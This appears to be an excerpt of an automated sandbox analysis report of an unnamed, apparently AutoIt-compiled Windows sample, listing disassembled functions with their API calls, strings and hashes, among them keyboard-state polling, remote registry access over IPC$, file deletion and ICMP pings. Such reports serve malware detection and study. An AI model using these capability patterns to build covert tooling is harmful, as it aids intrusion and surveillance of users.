                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                        • API String ID: 2116804098-2391861430
                                                                                                                                        • Opcode ID: 07a17175220284ba5cef9e4a3bc77596bc3250a52f1d31c9b4bfbb9874b177ef
                                                                                                                                        • Instruction ID: de6af5ba0a23b607cf9cb3dff512dc88b1523766f97d961cd72dcbafb49dc1bd
                                                                                                                                        • Opcode Fuzzy Hash: 07a17175220284ba5cef9e4a3bc77596bc3250a52f1d31c9b4bfbb9874b177ef
                                                                                                                                        • Instruction Fuzzy Hash: AD51B371900209FACF25FBA0CD4AEEEB779AF54304F104265F506B2161EA396F58DFA0
                                                                                                                                        APIs
                                                                                                                                        • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 007AD37F
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 007AD3A0
                                                                                                                                        • __swprintf.LIBCMT ref: 007AD3F3
                                                                                                                                        • _wprintf.LIBCMT ref: 007AD499
                                                                                                                                        • _wprintf.LIBCMT ref: 007AD4B7
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: LoadString_wprintf$__swprintf_memmove
                                                                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                        • API String ID: 2116804098-3420473620
                                                                                                                                        • Opcode ID: 7b820f0a170e9ccfde3865851d3c4d3723543a471f90aeb0a0f786586089fa54
                                                                                                                                        • Instruction ID: 583f3c5cfd084c2c164798d7d372d754b7f16f44a2adf6e55015a87564e75378
                                                                                                                                        • Opcode Fuzzy Hash: 7b820f0a170e9ccfde3865851d3c4d3723543a471f90aeb0a0f786586089fa54
                                                                                                                                        • Instruction Fuzzy Hash: A451A471900209FACF25FBE0DD4ADEEB779AF18700F108265B506B2161EA796F58DF60
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00767E53: _memmove.LIBCMT ref: 00767EB9
                                                                                                                                        • _memset.LIBCMT ref: 0079AF74
                                                                                                                                        • WNetAddConnection2W.MPR(?,?,?,00000000), ref: 0079AFA9
                                                                                                                                        • RegConnectRegistryW.ADVAPI32(?,80000002,?), ref: 0079AFC5
                                                                                                                                        • RegOpenKeyExW.ADVAPI32(?,?,00000000,00020019,?,?,SOFTWARE\Classes\), ref: 0079AFE1
                                                                                                                                        • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,?,?,?,SOFTWARE\Classes\), ref: 0079B00B
                                                                                                                                        • CLSIDFromString.COMBASE(?,?), ref: 0079B033
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0079B03E
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,SOFTWARE\Classes\), ref: 0079B043
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Close$ConnectConnection2FromOpenQueryRegistryStringValue_memmove_memset
                                                                                                                                        • String ID: SOFTWARE\Classes\$\CLSID$\IPC$
                                                                                                                                        • API String ID: 1411258926-22481851
                                                                                                                                        • Opcode ID: 8f434e224b0e15b000782232244b9439f95799df228bd6d8f225157a466c76c4
                                                                                                                                        • Instruction ID: 944d3a4080ff2162fca8e351d3b7ef3ea55c4057007d4ce50dd629a36de790e4
                                                                                                                                        • Opcode Fuzzy Hash: 8f434e224b0e15b000782232244b9439f95799df228bd6d8f225157a466c76c4
                                                                                                                                        • Instruction Fuzzy Hash: AC412C75C1122DEACF21EBA4DC85CEEB778FF08704F004129E812A2151EB799E04CF90
                                                                                                                                        APIs
                                                                                                                                        • CharUpperBuffW.USER32(?,?,?,?,?,?,?,007C2AA6,?,?), ref: 007C3B0E
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.3262966168.0000000000760000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000080E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000081A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.000000000083C000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3263100462.00000000008C5000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264165188.00000000008CB000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                        • Associated: 00000002.00000002.3264320010.00000000008CC000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BuffCharUpper
                                                                                                                                        • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                        • API String ID: 3964851224-909552448
                                                                                                                                        • Opcode ID: cb048d7ccbf51261494fc6bbca8027dd2cb33928829ac7537ae7ee75490af490
                                                                                                                                        • Instruction ID: f0b0aa1e063c89d689b5beffc0f6acf1e2a991fa0d9e7877198639dad4071ea7
                                                                                                                                        • Opcode Fuzzy Hash: cb048d7ccbf51261494fc6bbca8027dd2cb33928829ac7537ae7ee75490af490
                                                                                                                                        • Instruction Fuzzy Hash: E841797415024ACBDF14EF44D944BEE3366BF25380F14882CEC66AB295DB389E5ACB61
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00767E53: _memmove.LIBCMT ref: 00767EB9
                                                                                                                                        • mciSendStringW.WINMM(status PlayMe mode,?,00000100,00000000), ref: 007A843F
                                                                                                                                        • mciSendStringW.WINMM(close PlayMe,00000000,00000000,00000000), ref: 007A8455
                                                                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 007A8466
                                                                                                                                        • mciSendStringW.WINMM(play PlayMe wait,00000000,00000000,00000000), ref: 007A8478
                                                                                                                                        • mciSendStringW.WINMM(play PlayMe,00000000,00000000,00000000), ref: 007A8489
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: SendString$_memmove
                                                                                                                                        • String ID: alias PlayMe$close PlayMe$open $play PlayMe$play PlayMe wait$status PlayMe mode
                                                                                                                                        • API String ID: 2279737902-1007645807
                                                                                                                                        • Opcode ID: ee55f869c0a03aa3951fb1ce65aea805e5e69ead7cdb9a71afbe53a274a83447
                                                                                                                                        • Instruction ID: 9ff802fd664fd23755619b95ac27a2ff7e0be3bbdc6566f39d92260edd84de7d
                                                                                                                                        • Opcode Fuzzy Hash: ee55f869c0a03aa3951fb1ce65aea805e5e69ead7cdb9a71afbe53a274a83447
                                                                                                                                        • Instruction Fuzzy Hash: 3411B261A40299B9D720A7A1CC4ADFF7A7CFFD6B00F4009297822E21C0DEB85E85C5B1
                                                                                                                                        APIs
                                                                                                                                        • timeGetTime.WINMM ref: 007A809C
                                                                                                                                          • Part of subcall function 0077E3A5: timeGetTime.WINMM(?,75A8B400,007D6163), ref: 0077E3A9
                                                                                                                                        • Sleep.KERNEL32(0000000A), ref: 007A80C8
                                                                                                                                        • EnumThreadWindows.USER32(?,Function_0004804C,00000000), ref: 007A80EC
                                                                                                                                        • FindWindowExW.USER32(?,00000000,BUTTON,00000000), ref: 007A810E
                                                                                                                                        • SetActiveWindow.USER32 ref: 007A812D
                                                                                                                                        • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 007A813B
                                                                                                                                        • SendMessageW.USER32(00000010,00000000,00000000), ref: 007A815A
                                                                                                                                        • Sleep.KERNEL32(000000FA), ref: 007A8165
                                                                                                                                        • IsWindow.USER32 ref: 007A8171
                                                                                                                                        • EndDialog.USER32(00000000), ref: 007A8182
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                                                                                        • String ID: BUTTON
                                                                                                                                        • API String ID: 1194449130-3405671355
                                                                                                                                        • Opcode ID: 8e35706bd013c99d149e721338b0c521a27740ccc0caad664ce2a9638e30beb8
                                                                                                                                        • Instruction ID: 4edc717a2871dfac60cdc34c19d3613ec07a968612efd6bfe8497e8d30ed4e3a
                                                                                                                                        • Opcode Fuzzy Hash: 8e35706bd013c99d149e721338b0c521a27740ccc0caad664ce2a9638e30beb8
                                                                                                                                        • Instruction Fuzzy Hash: 6221CC70200248BFD7316B61DCD9B263B2AF7AA389F448259F41186161CF7E5D56871A
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,00000000,?,007D3C64,00000010,00000000,Bad directive syntax error,007FDBF0,00000000,?,00000000,?,>>>AUTOIT SCRIPT<<<), ref: 007A32D1
                                                                                                                                        • LoadStringW.USER32(00000000,?,007D3C64,00000010), ref: 007A32D8
                                                                                                                                          • Part of subcall function 0076CAEE: _memmove.LIBCMT ref: 0076CB2F
                                                                                                                                        • _wprintf.LIBCMT ref: 007A3309
                                                                                                                                        • __swprintf.LIBCMT ref: 007A332B
                                                                                                                                        • MessageBoxW.USER32(00000000,00000001,00000001,00011010), ref: 007A3395
                                                                                                                                        Strings
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HandleLoadMessageModuleString__swprintf_memmove_wprintf
                                                                                                                                        • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                        • API String ID: 1506413516-4153970271
                                                                                                                                        • Opcode ID: b251bf0b75e7785b44beaaa9f6914ebce69534601b4452789beb43572a53df07
                                                                                                                                        • Instruction ID: b9ab67968bc2b6eb08c41cd6e83f684b2d26627a7cb4cc777debb55be298fb17
                                                                                                                                        • Opcode Fuzzy Hash: b251bf0b75e7785b44beaaa9f6914ebce69534601b4452789beb43572a53df07
                                                                                                                                        • Instruction Fuzzy Hash: 55219F3184421EFBCF15AFD0CC0AEEE7739FF18701F004455B926A50A2DA79AB54DB60
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007AC6A0: __time64.LIBCMT ref: 007AC6AA
                                                                                                                                          • Part of subcall function 007641A7: _fseek.LIBCMT ref: 007641BF
                                                                                                                                        • __wsplitpath.LIBCMT ref: 007AC96F
                                                                                                                                          • Part of subcall function 0078297D: __wsplitpath_helper.LIBCMT ref: 007829BD
                                                                                                                                        • _wcscpy.LIBCMT ref: 007AC982
                                                                                                                                        • _wcscat.LIBCMT ref: 007AC995
                                                                                                                                        • __wsplitpath.LIBCMT ref: 007AC9BA
                                                                                                                                        • _wcscat.LIBCMT ref: 007AC9D0
                                                                                                                                        • _wcscat.LIBCMT ref: 007AC9E3
                                                                                                                                          • Part of subcall function 007AC6E4: _memmove.LIBCMT ref: 007AC71D
                                                                                                                                          • Part of subcall function 007AC6E4: _memmove.LIBCMT ref: 007AC72C
                                                                                                                                        • _wcscmp.LIBCMT ref: 007AC92A
                                                                                                                                          • Part of subcall function 007ACE59: _wcscmp.LIBCMT ref: 007ACF49
                                                                                                                                          • Part of subcall function 007ACE59: _wcscmp.LIBCMT ref: 007ACF5C
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 007ACB8D
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007ACC24
                                                                                                                                        • CopyFileW.KERNEL32(?,?,00000000,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001), ref: 007ACC3A
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007ACC4B
                                                                                                                                        • DeleteFileW.KERNEL32(?,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004,00000001,?,?,00000004), ref: 007ACC5D
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Delete$_wcscat_wcscmp$__wsplitpath_memmove$Copy__time64__wsplitpath_helper_fseek_wcscpy
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 152968663-0
                                                                                                                                        • Opcode ID: 6f97787f185f84618ce91c482a977227641d2192bec8bed56a23cbb7e6f8f427
                                                                                                                                        • Instruction ID: 78300803b695296e8b7e776873fcaefa455a44a10365284d67a9c8f0c4d4955e
                                                                                                                                        • Opcode Fuzzy Hash: 6f97787f185f84618ce91c482a977227641d2192bec8bed56a23cbb7e6f8f427
                                                                                                                                        • Instruction Fuzzy Hash: 28C14BB190011DAECF11DFA5CC85EEEB7BDAF89310F0041AAF609E6151DB789A84CF65
                                                                                                                                        APIs
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscpy$FolderUninitialize_memset$BrowseDesktopFromInitializeListMallocPath
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3566271842-0
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 007A3908
                                                                                                                                        • SetKeyboardState.USER32(?), ref: 007A3973
                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 007A3993
                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 007A39AA
                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 007A39D9
                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 007A39EA
                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 007A3A16
                                                                                                                                        • GetKeyState.USER32(00000011), ref: 007A3A24
                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 007A3A4D
                                                                                                                                        • GetKeyState.USER32(00000012), ref: 007A3A5B
                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 007A3A84
                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 007A3A92
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,00000001), ref: 0079FB19
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0079FB2B
                                                                                                                                        • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0079FB89
                                                                                                                                        • GetDlgItem.USER32(?,00000002), ref: 0079FB94
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0079FBA6
                                                                                                                                        • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0079FBFC
                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 0079FC0A
                                                                                                                                        • GetWindowRect.USER32(00000000,?), ref: 0079FC1B
                                                                                                                                        • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0079FC5E
                                                                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 0079FC6C
                                                                                                                                        • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0079FC89
                                                                                                                                        • InvalidateRect.USER32(?,00000000,00000001), ref: 0079FC96
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3096461208-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0077B155: GetWindowLongW.USER32(?,000000EB), ref: 0077B166
                                                                                                                                        • GetSysColor.USER32(0000000F), ref: 0077B067
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ColorLongWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 259745315-0
                                                                                                                                        APIs
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _wcscat_wcscpy$__wsplitpath$_wcschr
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 136442275-0
                                                                                                                                        APIs
                                                                                                                                        • __swprintf.LIBCMT ref: 007684E5
                                                                                                                                        • __itow.LIBCMT ref: 00768519
                                                                                                                                          • Part of subcall function 00782177: _xtow@16.LIBCMT ref: 00782198
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __itow__swprintf_xtow@16
                                                                                                                                        • String ID: %.15g$0x%p$False$True
                                                                                                                                        • API String ID: 1502193981-2263619337
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 00785CCA
                                                                                                                                          • Part of subcall function 0078889E: __getptd_noexit.LIBCMT ref: 0078889E
                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00785D63
                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00785D99
                                                                                                                                        • __gmtime64_s.LIBCMT ref: 00785DB6
                                                                                                                                        • __allrem.LIBCMT ref: 00785E0C
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00785E28
                                                                                                                                        • __allrem.LIBCMT ref: 00785E3F
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00785E5D
                                                                                                                                        • __allrem.LIBCMT ref: 00785E74
                                                                                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00785E92
                                                                                                                                        • __invoke_watson.LIBCMT ref: 00785F03
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 384356119-0
                                                                                                                                        APIs
                                                                                                                                        • _memset.LIBCMT ref: 007A5816
                                                                                                                                        • GetMenuItemInfoW.USER32(008218F0,000000FF,00000000,00000030), ref: 007A5877
                                                                                                                                        • SetMenuItemInfoW.USER32(008218F0,00000004,00000000,00000030), ref: 007A58AD
                                                                                                                                        • Sleep.KERNEL32(000001F4), ref: 007A58BF
                                                                                                                                        • GetMenuItemCount.USER32(?), ref: 007A5903
                                                                                                                                        • GetMenuItemID.USER32(?,00000000), ref: 007A591F
                                                                                                                                        • GetMenuItemID.USER32(?,-00000001), ref: 007A5949
                                                                                                                                        • GetMenuItemID.USER32(?,?), ref: 007A598E
                                                                                                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 007A59D4
                                                                                                                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A59E8
                                                                                                                                        • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 007A5A09
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4176008265-0
                                                                                                                                        APIs
                                                                                                                                        • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 007C9AA5
                                                                                                                                        • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 007C9AA8
                                                                                                                                        • GetWindowLongW.USER32(?,000000F0), ref: 007C9ACC
                                                                                                                                        • _memset.LIBCMT ref: 007C9ADD
                                                                                                                                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 007C9AEF
                                                                                                                                        • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 007C9B67
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: MessageSend$LongWindow_memset
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 830647256-0
                                                                                                                                        APIs
                                                                                                                                        • GetKeyboardState.USER32(?), ref: 007A3591
                                                                                                                                        • GetAsyncKeyState.USER32(000000A0), ref: 007A3612
                                                                                                                                        • GetKeyState.USER32(000000A0), ref: 007A362D
                                                                                                                                        • GetAsyncKeyState.USER32(000000A1), ref: 007A3647
                                                                                                                                        • GetKeyState.USER32(000000A1), ref: 007A365C
                                                                                                                                        • GetAsyncKeyState.USER32(00000011), ref: 007A3674
                                                                                                                                        • GetKeyState.USER32(00000011), ref: 007A3686
                                                                                                                                        • GetAsyncKeyState.USER32(00000012), ref: 007A369E
                                                                                                                                        • GetKeyState.USER32(00000012), ref: 007A36B0
                                                                                                                                        • GetAsyncKeyState.USER32(0000005B), ref: 007A36C8
                                                                                                                                        • GetKeyState.USER32(0000005B), ref: 007A36DA
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: State$Async$Keyboard
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 541375521-0
                                                                                                                                        APIs
                                                                                                                                        • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 0079A2AA
                                                                                                                                        • SafeArrayAllocData.OLEAUT32(?), ref: 0079A2F5
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 0079A307
                                                                                                                                        • SafeArrayAccessData.OLEAUT32(?,?), ref: 0079A327
                                                                                                                                        • VariantCopy.OLEAUT32(?,?), ref: 0079A36A
                                                                                                                                        • SafeArrayUnaccessData.OLEAUT32(?), ref: 0079A37E
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0079A393
                                                                                                                                        • SafeArrayDestroyData.OLEAUT32(?), ref: 0079A3A0
                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0079A3A9
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 0079A3BB
                                                                                                                                        • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0079A3C6
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2706829360-0
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 007684A6: __swprintf.LIBCMT ref: 007684E5
                                                                                                                                          • Part of subcall function 007684A6: __itow.LIBCMT ref: 00768519
                                                                                                                                        • CoInitialize.OLE32 ref: 007BB298
                                                                                                                                        • CoUninitialize.COMBASE ref: 007BB2A3
                                                                                                                                        • CoCreateInstance.COMBASE(?,00000000,00000017,007ED8FC,?), ref: 007BB303
                                                                                                                                        • IIDFromString.COMBASE(?,?), ref: 007BB376
                                                                                                                                        • VariantInit.OLEAUT32(?), ref: 007BB410
                                                                                                                                        • VariantClear.OLEAUT32(?), ref: 007BB471
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_760000_UNK_.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                                        • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                                        • API String ID: 834269672-1287834457
                                                                                                                                        APIs
                                                                                                                                        • WSAStartup.WS2_32(00000101,?), ref: 007B86F5
                                                                                                                                        • inet_addr.WS2_32(?), ref: 007B873A
                                                                                                                                        • gethostbyname.WS2_32(?), ref: 007B8746
                                                                                                                                        • IcmpCreateFile.IPHLPAPI ref: 007B8754
                                                                                                                                        • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 007B87C4
                                                                                                                                        • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 007B87DA
                                                                                                                                        • IcmpCloseHandle.IPHLPAPI(00000000), ref: 007B884F
                                                                                                                                        • WSACleanup.WS2_32 ref: 007B8855
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.3263100462.0000000000761000.00000040.00000001.01000000.00000005.sdmp, Offset: 00760000, based on PE: true
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
